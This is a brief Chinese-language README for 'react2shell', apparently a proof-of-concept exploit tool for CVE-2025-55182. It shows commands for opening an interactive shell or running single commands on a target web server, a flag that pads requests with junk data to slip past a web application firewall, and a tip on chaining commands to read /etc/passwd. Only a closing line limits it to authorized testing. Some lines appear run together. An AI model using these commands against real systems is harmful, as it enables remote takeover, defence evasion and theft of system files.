CVE-2025-55182 PoC(概念验证)
# 交互式 Shell
./react2shell -u http://target:3000
# 单条命令
./react2shell -u http://target:3000 -c "id"
# WAF 绕过(128KB 垃圾数据)
./react2shell -u http://target:3000 -waf 128
go build -o react2shell .
| 标志 | 描述 |
|---|---|
-u | 目标 URL |
-c | 单条命令(可选) |
-waf | WAF 绕过的垃圾数据大小,单位为 KB(可选) |
; 或 && 来串联命令:cd /etc && cat passwd仅限授权的安全测试使用。